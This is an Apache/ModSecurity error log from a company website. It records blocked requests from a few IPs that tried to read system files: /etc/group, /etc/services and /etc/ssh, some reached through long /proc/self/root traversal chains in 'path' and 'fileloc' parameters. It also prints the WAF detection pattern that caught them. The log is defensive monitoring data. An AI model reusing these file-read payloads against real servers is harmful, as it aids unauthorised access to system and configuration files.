[Tue Mar 17 14:56:28.168416 2026] [:error] [pid 9299:tid 140411632822016] [client 216.73.216.191:64806] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVzL-sgTmmJoPuMdy63QAAAs0"]
[Tue Mar 17 14:56:30.612723 2026] [:error] [pid 19507:tid 140411624429312] [client 216.73.216.191:9203] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmVztY0UrI5A3LftIwA7AAAAY4"]
[Tue Mar 17 14:56:40.137835 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42730] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:56:46.898189 2026] [:error] [pid 6296:tid 140411590858496] [client 74.7.241.31:49494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmV3nIk7brgkOH-rIWQSQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:56:52.173883 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.243.128:33860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmV5L-sgTmmJoPuMdy67AAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:56:53.191182 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:51184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmV5dY0UrI5A3LftIwBCwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:57:01.125870 2026] [proxy_fcgi:error] [pid 9299:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43252] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:57:20.823085 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.128:46064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWAKBJNF7axNlVR0UdAgAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:57:23.129796 2026] [proxy_fcgi:error] [pid 2598:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43724] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:57:43.055817 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.241.31:51198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWF6BJNF7axNlVR0UdGwAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:57:45.098025 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44206] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:58:00.502187 2026] [mime_magic:error] [pid 7004:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:50700] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/dovecot
[Tue Mar 17 14:58:00.502328 2026] [access_compat:error] [pid 7004:tid 140411683178240] [client 74.7.243.128:50700] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/dovecot
[Tue Mar 17 14:58:07.128619 2026] [proxy_fcgi:error] [pid 6296:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44664] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:58:11.418911 2026] [:error] [pid 6296:tid 140411666392832] [client 216.73.216.191:7537] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWM3Ik7brgkOH-rIWQigAAAUk"]
[Tue Mar 17 14:58:21.087654 2026] [:error] [pid 7004:tid 140411741927168] [client 74.7.244.43:53216] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmWPcU6Sx0TG1YjmQiz2gAAAoA"]
[Tue Mar 17 14:58:27.903100 2026] [:error] [pid 18380:tid 140411658000128] [client 74.7.228.61:49430] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmWQ64xEDsg_V3ESNZRGwAAAgo"]
[Tue Mar 17 14:58:29.045810 2026] [proxy_fcgi:error] [pid 7004:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45274] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:58:38.015947 2026] [:error] [pid 18380:tid 140411582465792] [client 216.73.216.191:56112] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWTq4xEDsg_V3ESNZRIgAAAhM"]
[Tue Mar 17 14:58:51.117801 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:59:13.125791 2026] [proxy_fcgi:error] [pid 7004:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46616] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:59:14.274455 2026] [:error] [pid 2473:tid 140411632822016] [client 216.73.216.191:35266] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWcqBJNF7axNlVR0UdUgAAAA0"]
[Tue Mar 17 14:59:15.667412 2026] [core:alert] [pid 6296:tid 140411649607424] [client 74.7.241.31:44110] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc
[Tue Mar 17 14:59:17.411312 2026] [:error] [pid 7437:tid 140411699963648] [client 216.73.216.191:19923] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWdQeiSKl8TjouI-YeewAAA8U"]
[Tue Mar 17 14:59:25.813467 2026] [:error] [pid 9299:tid 140411557287680] [client 216.73.216.191:52219] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWfb-sgTmmJoPuMdy7VwAAAtY"]
[Tue Mar 17 14:59:27.193624 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.31:34844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWf6BJNF7axNlVR0UdZAAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:59:34.389394 2026] [:error] [pid 9299:tid 140411548894976] [client 216.73.216.191:52219] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWhr-sgTmmJoPuMdy7YAAAAtc"]
[Tue Mar 17 14:59:35.133916 2026] [proxy_fcgi:error] [pid 9299:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47200] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:59:42.090733 2026] [:error] [pid 7437:tid 140411599251200] [client 216.73.216.191:42448] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWjgeiSKl8TjouI-YehAAAA9E"]
[Tue Mar 17 14:59:55.292647 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.241.31:45318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWm7-sgTmmJoPuMdy7dQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:59:56.104272 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:00:18.121818 2026] [proxy_fcgi:error] [pid 18380:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48324] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:00:23.870228 2026] [:error] [pid 7437:tid 140411691570944] [client 216.73.216.191:46464] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWtgeiSKl8TjouI-YepwAAA8Y"]
[Tue Mar 17 15:00:25.689123 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.241.31:37108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWuat8Nd0UC_OcbVHQBwAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:00:34.467711 2026] [:error] [pid 7437:tid 140411641214720] [client 216.73.216.191:51129] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWwgeiSKl8TjouI-YerwAAA8w"]
[Tue Mar 17 15:00:39.167825 2026] [:error] [pid 17965:tid 140411616036608] [client 74.7.241.31:37108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWx6t8Nd0UC_OcbVHQDAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:00:40.137806 2026] [proxy_fcgi:error] [pid 9299:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48776] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:00:43.773937 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.241.31:37666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmWyhj0p0SRWAqcjGF-uwAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
